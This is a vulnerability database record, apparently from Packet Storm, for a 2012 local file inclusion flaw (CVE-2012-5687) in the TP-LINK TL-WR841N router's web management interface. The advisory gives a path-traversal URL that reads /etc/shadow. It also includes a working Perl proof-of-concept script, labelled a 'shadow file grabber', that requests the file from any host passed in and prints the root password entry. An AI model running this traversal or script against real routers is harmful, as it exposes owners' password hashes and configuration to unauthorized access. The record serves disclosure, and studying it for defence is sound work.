ID

VAR-E-201210-0488


TITLE

TP-LINK TL-WR841N Local File Inclusion

Trust: 0.5

sources: PACKETSTORM: 117749

DESCRIPTION

TP-LINK TL-WR841N suffers from a local file inclusion vulnerability. Firmware versions 3.13.9 Build 120201 Rel.54965n and below are affected.

Trust: 0.5

sources: PACKETSTORM: 117749

AFFECTED PRODUCTS

vendor:tp linkmodel:tl-wr841nscope: - version: -

Trust: 0.5

sources: PACKETSTORM: 117749

EXPLOIT

=| Security Advisory - TP-LINK TL-WR841N LFI |=

Issue: TL-WR841N 300Mbps Wireless N Router by "TP-LINK"
Firmware Version: 3.13.9 Build 120201 Rel.54965n And Below versions
Discovered Date: 24/10/2012
CVE-ID: CVE-2012-5687
Author: Matan Azugi [matan@madsec.co.il] Product Vendor:
http://www.tp-link.com/en/products/details/?model=TL-WR841N

Details:

TP-LINK TL-WR841N Wireless Router is prone to a Local File Inclusion(LFI)
Vulnerability.
The vulnerability exists in Web-Based Management. The URL parameter is not
properly sanitized before being used.
Exploitation URL:

http://192.168.0.1/help/../../../../../../../../etc/shadow

Successful exploitation allows viewing the router configuration\xa0and password
files.

Proof of Concept Code:

#TP-LINK TL-WR841N Shadow file grabber#
#built by Pulse matan@madsec.co.il#
#enjoy#

use LWP::UserAgent;
$host = $ARGV[0];
chomp($host);
if($host !~ /http:\/\//) { $host = "http://$host"; };

my $ua = LWP::UserAgent->new;
$ua->timeout(30);
$lfi = "/help/../../../../../../../../etc/shadow";
$url = $host.$lfi;
$request = HTTP::Request->new('GET', $url); $response =
$ua->request($request); my $html = $response->content; if($html =~ /root/) {
print "root$' \n" ; }

Thank You,
Matan Azugi, MCSE OSCP
http://www.madsec.co.il

Trust: 0.5

sources: PACKETSTORM: 117749

EXPLOIT HASH

LOCAL

SOURCE

md5: 225a2085909e50e1666f8a7262a2b9f0
sha-1: acfb64943ac82c1c64aaf2e8787f959cd19065ad
sha-256: 30b33ca4e19b4006382480798e9d11511f9fab053f7f020f3416d3cf693d302a
md5: 225a2085909e50e1666f8a7262a2b9f0

Trust: 0.5

sources: PACKETSTORM: 117749

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 117749

TYPE

file inclusion

Trust: 0.5

sources: PACKETSTORM: 117749

TAGS

tag:exploit

Trust: 0.5

tag:local

Trust: 0.5

tag:file inclusion

Trust: 0.5

sources: PACKETSTORM: 117749

CREDITS

Matan Azugi

Trust: 0.5

sources: PACKETSTORM: 117749

EXTERNAL IDS

db:PACKETSTORMid:117749

Trust: 0.5

sources: PACKETSTORM: 117749

SOURCES

db:PACKETSTORMid:117749

LAST UPDATE DATE

2022-07-27T09:49:53.432000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:117749date:2012-10-29T23:40:33